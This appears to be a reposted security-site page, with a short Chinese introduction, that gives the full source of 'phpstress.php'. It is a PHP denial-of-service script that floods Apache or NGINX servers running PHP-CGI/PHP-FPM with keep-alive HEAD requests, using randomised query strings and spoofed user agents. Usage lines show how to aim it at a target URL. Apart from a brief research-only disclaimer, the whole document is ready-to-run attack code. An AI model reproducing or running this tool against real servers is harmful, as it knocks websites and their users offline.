|
使用标准cable/DSL连接,这种攻击可以使用标准的HTTP请求占满一台Linux web服务器的CPU和内存。这种攻击影响使用PHP-CGI或PHP-FPM(包含WordPress站点在内)解析PHP动态内容的Apache或者NGINX web服务器。另外,这种攻击制造的请求将会在攻击后的较长时间内继续占用服务器资源。 本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
<?php
#!/usr/bin/php
/*
File: phpstress.php
Written by: d4rk0 / @d4rk0s
Concept by: Vinny Troia / @VinnyTroia
Night Lion Security (http://www.nightlionsecurity.com)
---------------------------------------------------------------------
Description:
This is a light-weight low-bandwidth required PHP script that creates
a type of denial of service on a Linux-based Apache or NGINX web server
that process PHP content with PHP-CGI (fcgid) or PHP-FPM (Apache or NGINX).
The script will create a number of fake PHP connections, causing the server
to quickly launch additional processes to meet the new demand. In addition,
the server's connections are kept open (via keep-alive), causing the server
to quickly run out of resources.
In order to completely max out the server's
resources, the script's delay parms need to both be set to 0.
For more information, please view the complete post at
http://www.nightlionsecurity.com/blog/
----------------------------------------------------------------------
Disclaimer:
Don't be a dick.
----------------------------------------------------------------------
Usage:
php phpstress.php http://www.target.com/?r=%r% -m 1000000000 -k Y -c 150 -d 0.5 -r 0.01
OR
php phpstress.php www.target.com/wp-content/?r=%r%
Socks Proxy: * NOT IN ALPHA VERSION
-s = Y or N / 127.0.0.1:9050 Username:Pw
Default is N leaving out Username:Pw means there is no Username and Password
Edit the phpstress.socks file if you want to use a socks proxy
----------------------------------------
Commands:
Target URL picking a resource intense page and inserting %r where the GET variables data is will generate random chars
-m = Maximum requests not specifying this will leave it at a large default number to exit script on
*nix flavored simply press control c to kill the program and exit or whatever TTY command you have setup
to exit a program on command line
Default value is 1000000000
-k = Y or N Keep Alive Check will check if Server uses the Keep-Alive Option to keep the connection alive
Default value is Y
-c = Maximum Request Per Connection each connection opened will then request D number of times
Default value of 150
-d = Delay Between Connections The number of seconds to delay between opening a new connection.
Default value: 0.5
-r = Delay Between Requests The number of seconds to delay between outgoing requests.
Default value: 0.04
*/
// BEGIN SCRIPT
error_reporting(0);
// make sure script has no time limit for execution
set_time_limit(0);
/*
Randomly pick a UserAgent for deployment on page request
PARAM: None
RETURN: returns a random user agent string
*/
function userAgentRand(){
// lets create our array with random user agents
$userArray = array("Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; RW; rv:1.8.0.7) Gecko/20110321 MultiZilla/4.33.2.6a SeaMonkey/8.6.55",
"Mozilla/5.0 (Windows NT 6.2; WOW64; rv:1.8.0.7) Gecko/20110321 MultiZilla/4.33.2.6a SeaMonkey/8.6.55",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-us) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-gb) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; de-de) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",
"Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)",
"Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)".
"Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)",
"Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
"Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)",
"Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36 Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10".
"Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 5.2; RW; rv:7.0a1) Gecko/20091211 SeaMonkey/9.23a1pre",
"Mozilla/5.0 (Windows NT 5.2; RW; rv:7.0a1) Gecko/20091211 SeaMonkey/9.23a1pre");
// Lets shuffle our array
shuffle($userArray);
// count how many user agents in array
$count = count($userArray);
// minus one to adjust starting at 0
$count = mt_rand(0,$count-1);
// return "Random" User Agent
return $userArray[$count];
}
/*
Function used for adding random string to request urls
PARAM: none
RETURN: returns random string of chars
*/
function quick_rand(){
$rand_string = "";
$letters = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z");
for($i=0;$i<mt_rand(5,16);$i++){
$rand_string.=$letters[array_rand($letters)];
}
return($rand_string);
}
/*
Parse the target URL to return the host, path and query
PARAM: the URL string to be parsed
RETURN: returns an array of host path & query
*/
function parseUrl($target_url){
$t = "";
$t = strpos($target_url,'http://');
if ($t === false) {
$target_url = "http://". $target_url;
}
$target_url_parsed = parse_url($target_url);
$target_url = array();
$target_url['scheme'] = $target_url_parsed['scheme'];
$target_url['host'] = $target_url_parsed['host'];
$target_url['path'] = $target_url_parsed['path'];
$target_url['query'] = $target_url_parsed['query'];
$target_url['port'] = $target_url_parsed['port'];
if(!$target_url['path']){
$target_url['path'] = '/';
}
if(!$target_url['port']){
$target_url['port'] = 80;
}
if ($target_url['scheme']){
// return Parsed Array for Deployment and usage
return $target_url;
}else{
// return proper url array
$target_url['host'] = "http://". $target_url['host'];
return $target_url;
}
}
/*
Check Query if none just append path if both append path + query
PARAM: the parsed array of target url
RETURN: return appended array
*/
function checkQuery($target_url){
if($target_url['query']){
$request_url = $target_url['path']."?".$target_url['query'];
} else {
$request_url = $target_url['path'];
}
// return request url
return $request_url;
}
/*
check if user is launching this from command line or browser
PARAM: none
RETURN: return 1=browser or 0=command line
*/
function checkCommandLine(){
if(defined('STDIN')){
$num = 0;
}else{
$num = 1;
}
return $num;
}
/*
Check if the remote host supports Keep-Alive
PARAM: parsed target URL
RETURN: either keep-alive or server doesn't support keep alive string
*/
function keepAlive($target_url){
// Grab random user agent
$useragent = userAgentRand();
// Send request with Keep-Alive header
$socket = fsockopen($target_url['host'], $target_url['port'], $errno, $errstr, 3);
// if connection cant open
if(!$socket){
die("Uh-oh: Failed to open a connection to ".$target_url['host']." on port ".$target_url['port']."\n\n");
}
// lets build payload for keep-alive check
$request = "HEAD / HTTP/1.1\r\nHOST: ".$target_url['host']."\r\nUser-Agent: ".
$useragent."\r\nConnection: Keep-Alive\r\n\r\n";
fwrite($socket, $request);
$reply = "";
// loop until end of buffer and socket stream
while (!feof($socket)){
$buffer=fgets($socket, 128);
$reply.=$buffer;
//Watch for end of reply and close socket/break out of loop
if($buffer == "\r\n"){
fclose($socket); break;
}
}
//Check if the reply to our above request includes 'Connection: close
if(strpos($reply, "Connection: close")){
return "NO:KEEP-ALIVE";
}else{ return "KEEP-ALIVE"; }
}
/*
This is the actual attack that will test the stress on the server
PARAM: target_url , request url , max requests , max request per connection
RETURN: returns TRUE
*/
function sendphpstress($target_url,$request_url,$mr,$mpc,$dbr,$dbc){
// max requests divided by max requests per connection
$max_connections = ceil($mr / $mpc);
echo "[!] To exit press control C or whatever TTY options are set to exit command line program\n\n\n";
// lets loop through connections
for($c=0;$c<$max_connections;$c++){
echo "Opening connection [".($c+1)."] to ".$target_url['host']."..";
@$attack_socket = fsockopen($target_url['host'], $target_url['port'], $errno, $error, 3);
// cant open socket display fail
if(!$attack_socket){
echo "failed (".$error.")"."\n";
} else {
// Success lets send out connections
echo "success"."\n"."Sending requests: |";
//Stay within our max_requests_per_connection limit
for($r=0;$r<$mpc;$r++){
// grab a ran user agent
$useragent = userAgentRand();
// build payload for attack
$request = "HEAD ".str_replace("%r%", quick_rand(), $request_url)." HTTP/1.1\r\nHOST: ".$target_url['host']."\r\nUser-Agent: ".$useragent."\r\nConnection: Keep-Alive\r\n\r\n";
// write socket and make connection
@fwrite($attack_socket, $request);
echo ".";
// Delay between requests 1 second requests
usleep($dbr * 1000000);
}
echo "|"."\n";
}
@fclose($attack_socket);
echo "Closed connection"."\n";
// amount of time to delay between connections
usleep($dbc * 1000000);
}
return True;
}
/*
This function takes all the commands and outputs them strips them and gets them ready for proper use
PARAM: the argv array of commands to be processed
RETURN: returns processed array or FALSE for error
*/
function inputCommand($commands){
// Take Commands Being Passed return values as array
$outputCommand = array();
// count number of commands for loop
$count = count($commands);
// loop through commands
for ($d = 0; $d < $count; $d++){
// lets build commands
switch ($commands[$d]){
// Display help list of commands and exit
case "--help":
return "HELP";
// Display help list of commands and exit
case "-":
return "HELP";
// socks proxy
case "-s":
$outputCommand[] = "-s";
// Grab Type /////////////////
$new_number = $d++;
$value = $commands[$d];
$outputCommand[$new_number] = $value; // Append data to Array
break;
// target
case "-t":
$outputCommand[] = "-t";
// Grab Type /////////////////
$new_number = $d++;
$value = $commands[$d];
$outputCommand[$new_number] = $value; // Append data to Array
// Grab Target ////////////////
break;
// maximum requests
case "-m":
$outputCommand[] = "-m";
// Grab Type /////////////////
$new_number = $d++;
$value = $commands[$d];
$outputCommand[$new_number] = $value; // Append data to Array
// Grab Target ////////////////
break;
// keep alive yes or no
case "-k":
$outputCommand[] = "-k";
// Grab Type /////////////////
$new_number = $d++;
$value = $commands[$d];
$outputCommand[$new_number] = $value; // Append data to Array
break;
// maximum request per connection
case "-c":
$outputCommand[] = "-c";
// Grab Type /////////////////
$new_number = $d++;
$value = $commands[$d];
$outputCommand[$new_number] = $value; // Append data to Array
break;
// delay between connections
case "-d":
$outputCommand[] = "-d";
// Grab Type /////////////////
$new_number = $d++;
$value = $commands[$d];
$outputCommand[$new_number] = $value; // Append data to Array
break;
// delay between requests
case "-r":
$outputCommand[] = "-r";
// Grab Type /////////////////
$new_number = $d++;
$value = $commands[$d];
$outputCommand[$new_number] = $value; // Append data to Array
break;
}
}
// return array with results
return $outputCommand;
}
/*
Check if we are on command line or not
PARAM: NONE
RETURN: NONE exits if true
*/
function commandLineCheck(){
// Check if not command line exit dont do anything
if ($num = checkCommandLine() === 1){
// return error to user and quit script
echo "<h1><B>Error: phpstress only runs from command line prompt</b></h1>";
exit(0);
}
}
/*
Displays the Help menu showing all available program commands
PARAM: NONE
RETURN: NONE exits
*/
function displayHelp(){
echo "
PHPStress 1.0
Usage: php phpstress.php [url] [options]
OPTIONS:
-t: Target URL picking a resource intense page and inserting %r
where the GET variables data is will generate random chars
-m: Maximum requests not specifying this will leave it at a large default number
Default value is 1000000000
-k: Keep Alive Check will check if Server uses the Keep-Alive Option
to keep the connection alive (Y or N)
Default value is Y
-c: Maximum Request Per Connection each connection opened will
then request D number of times
Default value of 150
-d: Delay Between Connections - The number of seconds to delay
between opening a new connection.
Default value: 0.5
-r: Delay Between Requests The number of seconds to delay between
outgoing requests
Default value: 0.04 \n\n";
exit(0);
}
/// END FUNCTIONS BEGIN ACTUAL SCRIPT
//*********************************************************
// check if on command line
commandLineCheck();
// sleep for a couple seconds before going
//echo " [X] Processing Commands Now lets begin Attack.";
//@usleep(1000666);
// check if arguments on commmand line are present
if (isset($argv[1])) {
// Process commands now
$results = inputCommand($argv);
// display help
if ($results === "HELP"){
// display help
displayHelp();
}
// Set counter Values
$d = 0;
$num = "";
/////////////////////
// Set Program Default Variables
$target_url = "";
$socks = "n";
$k = "y";
$mr = 10000000;
$mpc = 150;
$dbr = 0.02;
$dbc = 0.7;
// lets assign all variables now and get ready for attack
foreach($results as $key=>$com){
// Socks proxy default N
if ($com == "-s"){
$r = $key;
if ($r == 0){ $r++;$r++; }else{
$r++;}
$socks = $results[$r];
}
// Maximum requests Default is 100000000
if ($com == "-m"){
$r = $key;
if ($r == 0){ $r++;$r++; }else{
$r++;}
$mr = $results[$r];
}
// Check is server keep alive? default is Y
if ($com == "-k"){
$r = $key;
if ($r == 0){ $r++;$r++; }else{
$r++;}
$k = $results[$r];
}
// Max request per connection
if ($com == "-c"){
$r = $key;
if ($r == 0){ $r++;$r++; }else{
$r++;}
$mpr = $results[$r];
}
// delay between connections
if ($com == "-d"){
$r = $key;
if ($r == 0){ $r++;$r++; }else{
$r++;}
$dbc = $results[$r];
}
// delay between requests
if ($com == "-r"){
$r = $key;
if ($r == 0){ $r++;$r++; }else{
$r++;}
$dbr = $results[$r];
}
}
// append url now
$target_url = $argv[1];
// Lets now check and set Default values
if (($target_url == "") || empty($target_url)){
// Error no Target URL set
echo " [!] ERROR: No Target URL set. \n";
exit(0);
}
// Socks check now
if ((strtolower($socks) == "n") || (strtolower($socks) == "y")){}else{
// error socks is either a n or y question
echo " [!] ERROR: Socks is either a [y]es or [n]o question\n\n";
exit(0);
}
// keep alive
if (strtolower($k) != "n" || strtolower($k) != "y"){}else{
// error socks is either a n or y question
echo " [!] ERROR: Keep Alive is either a [y]es or [n]o question\n";
exit(0);
}
// Max request check now
if ((is_numeric($mr)) || ($mr != "") || (!empty($mr))){}else{
// error max request is not a number
echo " [!] ERROR: Max Request must be a valid number. Default is 100000000\n";
exit(0);
}
// Max per connection
if ((is_numeric($mpc)) || ($mpc != "") || (!empty($mpc))){}else{
// error max request is not a number
echo " [!] ERROR: Max Request Per Connection is invalid. Default is 150\n";
exit(0);
}
// Delay between request
if ((is_numeric($dbr)) || ($dbr != "") || (!empty($dbr))){}else{
// error
echo " [!] ERROR: Delay between requests is invalid. Default is 0.04 seconds. \n";
exit(0);
}
// Delay between connections
if ((is_numeric($dbc)) || ($dbc != "") || (!empty($dbc))){}else{
// error
echo " [!] ERROR: Delay between connections is invalid. Default is 0.5 seconds. \n";
exit(0);
}
}else{
// display help
displayHelp();
exit(0);
}
// parse target url return a parsed array
$target_url = parseUrl($target_url);
// check if query empty or not empty
$request_url = checkQuery($target_url);
if ($k == "y"){
// check if server supports keep-alive make sure its a parsed target url
$keepAlive = keepAlive($target_url);
// Switch to check results if server keeps alive
switch ($keepAlive){
case "NO:KEEP-ALIVE":
$mpc = 1;
break;
case "KEEP-ALIVE":
$mpc = 100;
break;
}
}
// send out payloads and connection
sendphpstress($target_url,$request_url,$mr,$mpc,$dbr,$dbc);
// EOF
?>
(责任编辑:IT) |